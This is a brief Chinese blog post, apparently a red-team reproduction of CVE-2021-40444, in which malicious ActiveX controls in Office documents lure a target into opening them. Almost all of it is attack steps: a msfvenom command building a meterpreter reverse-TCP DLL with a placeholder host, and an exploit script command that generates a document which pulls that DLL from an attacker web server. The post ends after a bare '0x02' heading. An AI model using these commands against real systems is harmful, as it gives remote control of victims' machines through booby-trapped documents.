CVE-2021-40444 复现

利用过程:在Office文档中添加恶意ActiveX控件,以此来诱导目标用户打开恶意文档

复现环境:Ubuntu + WIN10 

利用工具:Github:https://github.com/lockedbyte/CVE-2021-40444

0x01 生成恶意dll :

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll > shell.dll

需要提前下载lcab库

 生成木马,url为打开文档后拉取恶意文件的web地址

python3 exploit.py generate test/shell.dll http://xxx.xxx.xxx.xxx:8088/

 

0x02

你可能感兴趣的:(红蓝对抗-攻防安全,ubuntu)